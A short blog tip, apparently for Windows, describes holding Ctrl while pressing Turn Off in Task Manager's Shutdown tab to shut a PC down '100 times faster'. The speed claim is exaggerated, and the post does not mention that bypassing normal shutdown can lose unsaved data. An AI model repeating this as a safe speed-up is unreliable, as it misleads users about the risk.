10.TRICK TO SHUTDOWN PC 100 TIMES FASTER
 
=>Press ctrl+alt+del
=>open task Manager
=>click the shutdown Tab.
=>While holding ctrl key,
=>Press TURN OFF.
 with this simple trick you can shut down your pc 100 times faster.

Related Posts Plugin for WordPress, Blogger...
Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
TRICKS AND TIPS CREATED BY SUSHIL UPADHYAY| Grants for single moms